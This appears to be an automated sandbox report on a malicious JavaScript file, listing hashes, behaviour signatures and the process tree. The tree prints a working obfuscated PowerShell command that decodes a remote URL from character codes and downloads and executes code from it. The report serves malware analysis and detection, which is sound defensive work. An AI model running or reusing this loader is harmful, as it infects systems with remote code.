Analysis
-
max time kernel
142s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20231020-en -
resource tags
arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system -
submitted
31/10/2023, 20:21
Static task
static1
Behavioral task
behavioral1
Sample
NQRX0468_5871143.js
Resource
win7-20231020-en
Behavioral task
behavioral2
Sample
NQRX0468_5871143.js
Resource
win10v2004-20231020-en
General
-
Target
NQRX0468_5871143.js
-
Size
270KB
-
MD5
a2e2da4033a7080a9b5d3fa24d150a8e
-
SHA1
285433bc8135b46f468fb6d0c374c482b164e938
-
SHA256
968593a6e89a4498ec0a56643dde91dc2412a9e2344c0b97a79af38b1ef26727
-
SHA512
9fc5d4e8205042971e4c253346c5c3ae380db9baf6fd17ef3264ed79e2bdc70089b1efd1f3d99e50f1a24b9bba47d308e0a1b68cd81609165c337905675ef908
-
SSDEEP
1536:JNiN4YlrlHqsDNgJqQAXq8+8EYYZPPnvqgu0V2OkHKFl8OBlaGLsAX5dYiTlSQpP:uNbqsCQ9B5qqF7Wl8xap7Htn7
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4104 2136 conhost.exe 85 -
Blocklisted process makes network request 2 IoCs
flow pid Process 8 932 powershell.exe 14 932 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 932 powershell.exe 932 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 932 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 4104 wrote to memory of 932 4104 conhost.exe 87 PID 4104 wrote to memory of 932 4104 conhost.exe 87
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\NQRX0468_5871143.js1⤵PID:3100
-
C:\Windows\system32\conhost.execonhost --headless powershell $tqgxwnpsabil=(8708,8693,8710,8714,8711,8715,8694,8705,8639,8709,8704,8705,8640,8642,8639,8705,8697,8705,8656,8697,8690,8708,8697,8654);$dosvorv=('richard','net-secure','get-container', 'display-addin');foreach($rob9e in $tqgxwnpsabil){$awi=$rob9e;$mbpvydxqefcr=$mbpvydxqefcr+[char]($awi-8593);$vizit=$mbpvydxqefcr; $lira=$vizit};$jlcbwxstuopf[2]=$lira;$dmzkpt='rl';$five=1;new-alias zwert cu$dmzkpt;.$([char](9992-9887)+'ex')(zwert -useb $lira)1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $tqgxwnpsabil=(8708,8693,8710,8714,8711,8715,8694,8705,8639,8709,8704,8705,8640,8642,8639,8705,8697,8705,8656,8697,8690,8708,8697,8654);$dosvorv=('richard','net-secure','get-container', 'display-addin');foreach($rob9e in $tqgxwnpsabil){$awi=$rob9e;$mbpvydxqefcr=$mbpvydxqefcr+[char]($awi-8593);$vizit=$mbpvydxqefcr; $lira=$vizit};$jlcbwxstuopf[2]=$lira;$dmzkpt='rl';$five=1;new-alias zwert cu$dmzkpt;.$([char](9992-9887)+'ex')(zwert -useb $lira)2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:932
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82